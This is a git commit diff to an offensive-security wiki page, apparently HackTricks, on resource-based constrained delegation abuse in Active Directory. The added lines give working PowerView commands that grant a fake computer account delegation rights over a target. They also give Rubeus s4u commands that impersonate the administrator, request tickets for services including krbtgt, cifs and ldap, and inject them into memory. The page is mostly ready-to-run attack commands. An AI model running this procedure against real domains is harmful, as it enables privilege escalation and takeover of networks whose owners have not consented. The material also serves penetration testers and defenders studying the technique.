GitBook: [master] one page modified
This commit is contained in:
parent
251e4c4856
commit
377b9602b3
@ -54,13 +54,32 @@ Get-DomainComputer FAKECOMPUTER #Check if created if you have powerview
|
|||||||
|
|
||||||
### Configuring R**esource-based Constrained Delegation**
|
### Configuring R**esource-based Constrained Delegation**
|
||||||
|
|
||||||
|
**Using activedirectory PowerShell module**
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
|
Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount FAKECOMPUTER$ #Assing delegation privileges
|
||||||
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it work
|
Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
|
||||||
```
|
```
|
||||||
|
|
||||||
![](../../.gitbook/assets/b2.png)
|
![](../../.gitbook/assets/b2.png)
|
||||||
|
|
||||||
|
#### Using powerview
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
|
||||||
|
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
|
||||||
|
$SDBytes = New-Object byte[] ($SD.BinaryLength)
|
||||||
|
$SD.GetBinaryForm($SDBytes, 0)
|
||||||
|
Get-DomainComputer $targetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
|
||||||
|
|
||||||
|
#Check that it worked
|
||||||
|
Get-DomainComputer $targetComputer -Properties 'msds-allowedtoactonbehalfofotheridentity'
|
||||||
|
|
||||||
|
msds-allowedtoactonbehalfofotheridentity
|
||||||
|
----------------------------------------
|
||||||
|
{1, 0, 4, 128...}
|
||||||
|
```
|
||||||
|
|
||||||
### Performing a complete S4U attack
|
### Performing a complete S4U attack
|
||||||
|
|
||||||
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
|
First of all, we created the new Computer object with the password `123456`, so we need the hash of that password:
|
||||||
@ -73,7 +92,13 @@ This will print the RC4 and AES hashes for that account.
|
|||||||
Now, the attack can be performed:
|
Now, the attack can be performed:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
|
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<aes256 hash> /aes128:<aes128 hash> /rc4:<rc4 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /domain:domain.local /ptt
|
||||||
|
```
|
||||||
|
|
||||||
|
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
|
||||||
```
|
```
|
||||||
|
|
||||||
{% hint style="danger" %}
|
{% hint style="danger" %}
|
||||||
@ -82,12 +107,6 @@ Note that users has an attribute called "**Cannot be delegated**". If a user has
|
|||||||
|
|
||||||
![](../../.gitbook/assets/b3.png)
|
![](../../.gitbook/assets/b3.png)
|
||||||
|
|
||||||
You can generate more tickets just asking once using the `/altservice` param of Rubeus:
|
|
||||||
|
|
||||||
```bash
|
|
||||||
rubeus.exe s4u /user:FAKECOMPUTER$ /aes256:<AES 256 hash> /impersonateuser:administrator /msdsspn:cifs/victim.domain.local /altservice:krbtgt,cifs,host,http,winrm,RPCSS,wsman,ldap /domain:domain.local /ptt
|
|
||||||
```
|
|
||||||
|
|
||||||
### Accessing
|
### Accessing
|
||||||
|
|
||||||
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
|
The last command line will perform the **complete S4U attack and will inject the TGS** from Administrator to the victim host in **memory**.
|
||||||
|
Loading…
Reference in New Issue
Block a user